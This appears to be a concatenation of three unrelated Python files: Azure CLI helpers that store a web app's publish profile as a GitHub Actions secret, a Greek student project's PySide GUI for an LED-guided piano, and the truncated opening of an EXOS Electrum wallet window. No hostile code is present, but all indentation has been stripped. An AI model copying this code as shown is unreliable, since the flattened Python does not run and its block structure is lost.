regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file)
if regex:
publish_profile = regex.group()
publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '')
publish_profile = publish_profile[:-2]
if publish_profile:
return publish_profile.strip()
return None
def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None,
branch="master", slot=None):
if repo:
repo_url = 'https://github.com/' + repo
else:
repo_url = None
site_source_control = show_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
if site_source_control:
if not repo_url:
repo_url = site_source_control.repo_url
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
config_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
repo_url=repo_url,
repository_type='github',
github_action=True,
branch=branch,
git_token=token,
slot=slot)
def _get_workflow_template(github, runtime_string, is_linux):
from github import GithubException
from github.GithubException import BadCredentialsException
file_contents = None
template_repo_path = 'Azure/actions-workflow-templates'
template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux)
try:
template_repo = github.get_repo(template_repo_path)
file_contents = template_repo.get_contents(template_file_path)
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when retrieving workflow template"
if e.data and e.data['message']:
error_msg += ": {}".format(e.data['message'])
raise CLIError(error_msg)
return file_contents
def _fill_workflow_template(content, name, branch, slot, publish_profile, version):
if not slot:
slot = 'production'
content = content.replace('${web-app-name}', name)
content = content.replace('${branch}', branch)
content = content.replace('${slot-name}', slot)
content = content.replace('${azure-webapp-publish-profile-name}', publish_profile)
content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile)
content = content.replace('${dotnet-core-version}', version)
content = content.replace('${java-version}', version)
content = content.replace('${node-version}', version)
content = content.replace('${python-version}', version)
return content
def _get_template_file_path(runtime_string, is_linux):
if not runtime_string:
raise CLIError('Unable to retrieve workflow template')
runtime_string = runtime_string.lower()
runtime_stack = runtime_string.split('|')[0]
template_file_path = None
if is_linux:
template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
else:
# Handle java naming
if runtime_stack == 'java':
java_container_split = runtime_string.split('|')
if java_container_split and len(java_container_split) >= 2:
if java_container_split[2] == 'tomcat':
runtime_stack = 'tomcat'
elif java_container_split[2] == 'java se':
runtime_stack = 'java'
template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
if not template_file_path:
raise CLIError('Unable to retrieve workflow template.')
return template_file_path
def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
# Get publish profile with secrets
import requests
logger.warning("Fetching publish profile with secrets for the app '%s'", name)
publish_profile_bytes = _generic_site_operation(
cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets',
slot, {"format": "WebDeploy"})
publish_profile = list(publish_profile_bytes)
if publish_profile:
publish_profile = publish_profile[0].decode('ascii')
else:
raise CLIError('Unable to retrieve publish profile.')
# Add publish profile with secrets as a GitHub Actions Secret in the repo
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
headers['Content-Type'] = 'application/json;'
headers['Accept'] = 'application/json;'
public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo)
public_key = requests.get(public_key_url, headers=headers)
if not public_key.ok:
raise CLIError('Request to GitHub for public key failed.')
public_key = public_key.json()
encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'],
secret_value=str(publish_profile))
payload = {
"encrypted_value": encrypted_github_actions_secret,
"key_id": public_key['key_id']
}
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers)
if str(stored_secret.status_code)[0] != '2':
raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code)
def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
import requests
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
requests.delete(store_secret_url, headers=headers)
def _runtime_supports_github_actions(runtime_string, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
supports = False
for stack in stacks:
if stack['displayName'].lower() == runtime_string.lower():
if 'github_actions_properties' in stack and stack['github_actions_properties']:
supports = True
return supports
def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux):
app_settings = None
app_runtime = None
if is_linux:
app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime = getattr(app_metadata, 'linux_fx_version', None)
return _get_app_runtime_info_helper(app_runtime, "", is_linux)
app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot)
app_metadata_properties = getattr(app_metadata, 'properties', {})
if 'CURRENT_STACK' in app_metadata_properties:
app_runtime = app_metadata_properties['CURRENT_STACK']
if app_runtime and app_runtime.lower() == 'node':
app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
for app_setting in app_settings:
if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION':
app_runtime_version = app_setting['value'] if 'value' in app_setting else None
if app_runtime_version:
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'python':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = getattr(app_settings, 'python_version', '')
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'dotnetcore':
app_runtime_version = '3.1'
app_runtime_version = ""
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'java':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format(
java_version=getattr(app_settings, 'java_version', '').lower(),
java_container=getattr(app_settings, 'java_container', '').lower(),
java_container_version=getattr(app_settings, 'java_container_version', '').lower()
)
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
def _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if stack['displayName'].lower() == app_runtime.lower():
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if (stack['github_actions_properties']['app_runtime'].lower() == app_runtime.lower() and
stack['github_actions_properties']['app_runtime_version'].lower() ==
app_runtime_version.lower()):
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
return None
def _encrypt_github_actions_secret(public_key, secret_value):
# Encrypt a Unicode string using the public key
from base64 import b64encode
public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
sealed_box = public.SealedBox(public_key)
encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
return b64encode(encrypted).decode("utf-8")
|
mainwindow.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from PySide import QtCore, QtGui
import time, sys
import threading
import os
execfile("shift_registers.py") # Import the shift registers code from other file
execfile("touch_sound.py") # MPR121 sensor/sounds
execfile("read_lifs.py")
class Ui_MainWindow(QtCore.QObject):
proponisi_mode = False
lastTouched = -1 # -1 for nothing pressed - get's the value from the MPR121 with signal
playingSong = False
changeInstrumentSignal = QtCore.Signal(object)
playNote = QtCore.Signal(object)
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setWindowModality(QtCore.Qt.NonModal)
MainWindow.resize(483, 304)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("piano.jpg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
self.centralWidget = QtGui.QWidget(MainWindow)
self.centralWidget.setObjectName("centralWidget")
self.tableWidget = QtGui.QTableWidget(self.centralWidget)
self.tableWidget.setGeometry(QtCore.QRect(10, 40, 461, 161))
self.tableWidget.setObjectName("tableWidget")
self.tableWidget.setColumnCount(3)
self.tableWidget.setRowCount(0)
item = QtGui.QTableWidgetItem()
self.tableWidget.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.tableWidget.setHorizontalHeaderItem(1, item)
item = QtGui.QTableWidgetItem()
self.tableWidget.setHorizontalHeaderItem(2, item)
self.label = QtGui.QLabel(self.centralWidget)
self.label.setGeometry(QtCore.QRect(10, 10, 161, 21))
font = QtGui.QFont()
font.setPointSize(12)
font.setWeight(75)
font.setBold(True)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtGui.QPushButton(self.centralWidget)
self.pushButton.setGeometry(QtCore.QRect(370, 220, 101, 31))
self.pushButton.setObjectName("pushButton")
self.checkBox = QtGui.QCheckBox(self.centralWidget)
self.checkBox.setGeometry(QtCore.QRect(220,220,140,31))
self.checkBox.setObjectName("checkBox")
self.doubleSpinBox = QtGui.QDoubleSpinBox(self.centralWidget)
self.doubleSpinBox.setGeometry(QtCore.QRect(30,225,80, 30))
self.doubleSpinBox.setSingleStep(0.15)
self.doubleSpinBox.setObjectName("doubleSpinBox")
self.label1 = QtGui.QLabel(self.centralWidget)
self.label1.setGeometry(QtCore.QRect(10, 200,140, 30))
self.label1.setObjectName("label1")
MainWindow.setCentralWidget(self.centralWidget)
self.menuBar = QtGui.QMenuBar(MainWindow)
self.menuBar.setGeometry(QtCore.QRect(0, 0, 483, 21))
self.menuBar.setObjectName("menuBar")
self.menuFile = QtGui.QMenu(self.menuBar)
self.menuFile.setObjectName("menuFile")
self.menuAbout = QtGui.QMenu(self.menuBar)
self.menuAbout.setObjectName("menuAbout")
self.menu = QtGui.QMenu(self.menuBar)
self.menu.setObjectName("menu")
MainWindow.setMenuBar(self.menuBar)
self.statusBar = QtGui.QStatusBar(MainWindow)
self.statusBar.setObjectName("statusBar")
MainWindow.setStatusBar(self.statusBar)
self.actionExit = QtGui.QAction(MainWindow)
self.actionExit.setObjectName("actionExit")
self.action = QtGui.QAction(MainWindow)
self.action.setObjectName("action")
self.action_2 = QtGui.QAction(MainWindow)
self.action_2.setObjectName("action_2")
self.actionLed_Test = QtGui.QAction(MainWindow)
self.actionLed_Test.setObjectName("actionLed_Test")
self.actionAbout = QtGui.QAction(MainWindow)
self.actionAbout.setObjectName("actionAbout")
self.menuFile.addAction(self.actionExit)
self.menuAbout.addAction(self.actionAbout)
self.menu.addAction(self.action)
self.menu.addAction(self.action_2)
self.menu.addAction(self.actionLed_Test)
self.menuBar.addAction(self.menuFile.menuAction())
self.menuBar.addAction(self.menu.menuAction())
self.menuBar.addAction(self.menuAbout.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.tableWidget.horizontalHeader().setResizeMode(QtGui.QHeaderView.Stretch) # Align table headers to the middle
self.action_2.setCheckable(True)
# connect the button actions to the functions made
ui.actionAbout.triggered.connect(self.aboutDialogMsg) # Connect the About Dialog with the Help->About menu button
ui.actionExit.triggered.connect(self.exitApp) # Connect the File->Exit menu button with the self.exitApp function
ui.actionLed_Test.triggered.connect(self.ledTest) # Connect the "Επιλογές"-> Led Test with the self.ledTest function
ui.action.triggered.connect(self.chooseInstrumentA) # Connect the "Επιλογές"-> "Επιλογή οργάνου" with the self.chooseInstrumentA function
ui.action_2.triggered.connect(self.setProponisi)
ui.pushButton.clicked.connect(self.playSong)
#test code for shift registers
shiftRegister.clearAll() # Make sure all leds are turned off first
#shiftRegister.testLeds()
self.sensor = touch_sensor() # Initiate the capacitive sensor
self.sensor.dataEmit.connect(self.printEmited) # Connect the sensor to the printEmited function mainly for training mode
self.playNote.connect(self.sensor.playNote) # Connect the local note playing singal with the threaded instrument/sensor
self.changeInstrumentSignal.connect(self.sensor.changeInstrument)
self.sensor.start() # Start running the capacitive sensor as it is in another thread for non blocking gui function
self.changeInstrumentSignal.emit("piano") # Emit a signal for changing the instrument in the thread
instrument.chooseInstrument("piano") # Set piano as the default instrument
lis = [0]*40
for x in TELO3_LEDS1:
lis[x] = 1
shiftRegister.writeSRL(lis, True)
readLif.openFiles() # Read the lif files from the folder
for name in readLif.getFileNames(): # Get all the file names and iterate through them
rowCount = ui.tableWidget.rowCount() # Get the current row in order to append after it one more row
ui.tableWidget.insertRow(rowCount) # Append after the last row, a new one
ui.tableWidget.setItem(rowCount, 0, QtGui.QTableWidgetItem(name)) # Set the name in the first column
ui.tableWidget.setItem(rowCount, 1, QtGui.QTableWidgetItem(readLif.getDifficulty(name))) # The second column in the row contains the difficulty
ui.tableWidget.setItem(rowCount, 2, QtGui.QTableWidgetItem(readLif.getInstrument(name))) # The third column contains the instrument the lif should be played on
return # Setup UI
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "PIano Project 2016", None, QtGui.QApplication.UnicodeUTF8))
self.tableWidget.horizontalHeaderItem(0).setText(QtGui.QApplication.translate("MainWindow", "Τίτλος Τραγουδιού", None, QtGui.QApplication.UnicodeUTF8))
self.tableWidget.horizontalHeaderItem(1).setText(QtGui.QApplication.translate("MainWindow", "Δυσκολία", None, QtGui.QApplication.UnicodeUTF8))
self.tableWidget.horizontalHeaderItem(2).setText(QtGui.QApplication.translate("MainWindow", "Όργανο", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("MainWindow", "Λίστα τραγουδιών:", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton.setText(QtGui.QApplication.translate("MainWindow", "Παίξε!", None, QtGui.QApplication.UnicodeUTF8))
self.menuFile.setTitle(QtGui.QApplication.translate("MainWindow", "Αρχείο", None, QtGui.QApplication.UnicodeUTF8))
self.menuAbout.setTitle(QtGui.QApplication.translate("MainWindow", "Help", None, QtGui.QApplication.UnicodeUTF8))
self.menu.setTitle(QtGui.QApplication.translate("MainWindow", "Επιλογές", None, QtGui.QApplication.UnicodeUTF8))
self.actionExit.setText(QtGui.QApplication.translate("MainWindow", "Έξοδος", None, QtGui.QApplication.UnicodeUTF8))
self.action.setText(QtGui.QApplication.translate("MainWindow", "Επιλογή Οργάνου", None, QtGui.QApplication.UnicodeUTF8))
self.action_2.setText(QtGui.QApplication.translate("MainWindow", "Προπόνηση Mode", None, QtGui.QApplication.UnicodeUTF8))
self.actionLed_Test.setText(QtGui.QApplication.translate("MainWindow", "Led Test", None, QtGui.QApplication.UnicodeUTF8))
self.actionAbout.setText(QtGui.QApplication.translate("MainWindow", "About", None, QtGui.QApplication.UnicodeUTF8))
self.checkBox.setText(QtGui.QApplication.translate("MainWindow", "Επίδειξη Κομματιού", None, QtGui.QApplication.UnicodeUTF8))
self.label1.setText(QtGui.QApplication.translate("MainWindow", "Επιτάχυνση Τραγουδιού:", None, QtGui.QApplication.UnicodeUTF8))
return
def aboutDialogMsg(QObject):
msg = QtGui.QMessageBox() # Create a new message box to show the names of the creators of the project
msg.setWindowTitle("About") # Set the title
msg.setText(u"Project για τα Τέλο 3 - 2016<br \> Σαμαράς Τάσος - Project Manager<br \>Αγγελίδης Αλέξανδρος<br \> Βασιλειάδης Κώστας<br \>Ηλιάδης Νίκος<br \>Κρασογιάννης Σταύρος<br \> Μητρόπουλος Σπύρος<br \>Μπουριτζής Σάκης<br \>")
msg.exec_() # Show the message box in the screen
return
def ledTest(self):
# User pressed on the Led Test button on the menu
t1 = threading.Thread(target=shiftRegister.testLeds) # Start the test in a new thread
t1.start()
msg = QtGui.QMessageBox.information(None, u"Τεστ σε εξέλιξη", u"Το τεστ γίνεται αυτή τη στιγμή. Πατήστε ΟΚ και περιμένετε για το μήνυμα ολοκλήρωσης") # Inform the user about the led test
t1.join() # Wait until thread completes the test and then call the testComplete function
self.testComplete()
return
def testComplete(self):
# When the led test completes this message will show up
msg = QtGui.QMessageBox()
msg.setWindowTitle(u"Επιτυχία!")
msg.setText(u"Το τέστ ολοκληρώθηκε με επιτυχία!")
msg.exec_()
return
def chooseInstrumentA(self):
# When the choose instrument key from the menu is pressed the user will be prommpted to select for an instrument from the instruments folder
instrumentList = os.listdir(instrument.baseInstrumentFolder) # List the folder of instruments to let the user select based on the name of the folder
choice, answer = QtGui.QInputDialog.getItem(None, u"Επιλογή Οργάνου", u"Επιλέξτε όργανο από τη λίστα παρακάτω", instrumentList, 0, False) # PopUp the question box
if answer == True: # If the user pressed the "OK" button
#instrument.chooseInstrument(choice)
self.changeInstrumentSignal.emit(choice)
return
def printEmited(self, data):
# Get the signal asynchronously from the MPR121 thread for lighting up the led and play the sound - if it is in proponisi mode
if self.proponisi_mode:
led_list = [0]*40
led_list[data*3] = 1
shiftRegister.writeSRL(led_list, True)
return
def setProponisi(self):
# When the action for training is pressed - trigger the action
if self.proponisi_mode == True:
self.proponisi_mode = False
else:
self.proponisi_mode = True
shiftRegister.clearAll()
return
def playSong(self):
if len(ui.tableWidget.selectedItems()) < 1: # Check if there is a selected song-row
msg = QtGui.QMessageBox()
msg.setWindowTitle(u"Επιλογή Τραγουδιού")
msg.setText(u"Παρακαλώ επιλέξτε τραγούδι πρώτα και μετά πατήστε το πλήκτρο \"Παίξε!\"")
msg.exec_()
return
filename = ""
for item in ui.tableWidget.selectedItems():
filename = ui.tableWidget.item(item.row(), 0).text() # Get the filename from the table widget as user clicked in a row
self.proponisi_mode = False # Disable the traning mode if it is enabled
self.action_2.setChecked(False) # Disable the check if existed
shiftRegister.clearAll() # Clear all leds to start playing the song
MainWindow.setEnabled(False)
self.playingSong = True
msg = QtGui.QMessageBox()
msg.setWindowTitle(u"Τραγούδι επιλέχθηκε")
msg.setText(u"Το τραγούδι <strong>" + filename + u"</strong> έχει επιλεγεί. Όταν είστε έτοιμοι πατήστε το πλήκτρο OK")
msg.exec_()
time.sleep(1)
totalLines = readLif.getTotalRows(filename)
fileLines = readLif.getLines(filename)
speedUp = self.doubleSpinBox.value()
for x in range(2, totalLines-2): # read the notes and the delays for them and iterate through them
KeyToBePressed, DelayUntiPressed = fileLines[x].split(":", 2) # For each note and the next two ones, take the delays and notes
KeyToBePressed1, DelayUntiPressed1 = fileLines[x+1].split(":", 2)
KeyToBePressed2, DelayUntiPressed2 = fileLines[x+2].split(":", 2)
led_list = [0]*40 # Make a list with all leds cleared
led_list[int(KeyToBePressed)*3] = 1 # Blue leds, the leds should be played first
led_list[int(KeyToBePressed1)*3+1] = 1 # Green leds for the next after blue
led_list[int(KeyToBePressed2)*3+2] = 1 # Red led last led comming
if self.checkBox.isChecked() == True:
self.playNote.emit(int(KeyToBePressed))
shiftRegister.writeSRL(led_list, True) # Write the list to the shift registers in reversed order
time.sleep(float(DelayUntiPressed)*(1/speedUp))
# Last two notes are out of range and should manually display the leds
KeyToBePressed, DelayUntiPressed = fileLines[totalLines-2].split(":", 2)
KeyToBePressed1, DelayUntiPressed1 = fileLines[totalLines-1].split(":", 2)
led_list = [0]*40
led_list[int(KeyToBePressed)*3] = 1
led_list[int(KeyToBePressed1)*3+1] = 1
self.playNote.emit(int(KeyToBePressed))
shiftRegister.writeSRL(led_list, True)
time.sleep(float(DelayUntiPressed)*(1/speedUp))
KeyToBePressed, DelayUntiPressed = fileLines[totalLines-1].split(":", 2)
led_list = [0]*40
led_list[int(KeyToBePressed)*3] = 1
self.playNote.emit(int(KeyToBePressed))
shiftRegister.writeSRL(led_list, True)
time.sleep(float(DelayUntiPressed)*(1/speedUp))
shiftRegister.clearAll()
msg = QtGui.QMessageBox()
msg.setWindowTitle(u"Τέλος Τραγουδιού!")
msg.setText(u"Το τραγούδι τελείωσε! Αν θέλετε μπορείτε να επιλέξετε άλλο τραγούδι και να παίξετε ξανά!")
msg.exec_()
shiftRegister.clearAll()
MainWindow.setEnabled(True) # Make the window visible/Enabled again
self.playingSong = False
return
def exitApp(self):
shiftRegister.clearAll() # Clear all the leds before closing
sys.exit()
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
MainWindow = QtGui.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum_exos
from electrum_exos import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_exos.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_exos.plugin import run_hook
from electrum_exos.i18n import _
from electrum_exos.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum_exos.transaction import Transaction, TxOutput
from electrum_exos.address_synchronizer import AddTransactionException
from electrum_exos.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_exos.version import ELECTRUM_VERSION, ELECTRUM_BUILD
from electrum_exos.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_exos.exchange_rate import FxThread
from electrum_exos.simple_config import SimpleConfig
from electrum_exos.logging import Logger
from electrum_exos.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("exos-electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="EXOS Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of EXOS Electrum.") + " " +
_("Would you like to be notified when there is a newer version of EXOS Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
